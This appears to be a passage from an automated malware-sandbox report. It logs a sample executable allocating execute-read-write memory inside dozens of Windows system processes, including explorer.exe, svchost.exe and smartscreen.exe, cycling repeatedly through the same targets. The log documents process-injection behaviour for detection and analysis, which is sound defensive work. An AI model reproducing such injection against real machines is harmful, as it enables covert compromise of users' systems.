        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 2B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 920000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 340000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 720000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 380000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 610000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 860000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 920000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: AF0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 940000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 9D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: A80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 3230000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: D70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 140000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AE0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 2C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 930000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 350000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 730000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 390000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 870000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 930000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: B00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 950000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 9E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: A90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 3250000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: D80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 150000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AF0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 2D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 410000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 360000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 740000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 630000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 880000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 940000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: B10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 960000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: AA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 33C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: D90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 160000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AE0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 2E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 420000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 370000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 750000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 640000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 890000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 950000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: B20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 970000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: AB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 33F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: DA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 170000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AF0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 2F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 430000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 380000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 760000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 650000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: DA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 8A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 960000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: B30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: AC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 3400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: DB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 180000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 300000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 440000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 200000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dllhost.exe base: A80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: C70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 390000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 770000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 660000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: DB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 8B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\dwm.exe base: 970000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\sihost.exe base: B40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 990000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: AD0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 3430000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: DC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BD0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\smartscreen.exe base: 310000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 600000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 450000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 200000 protect: page execute and read and write
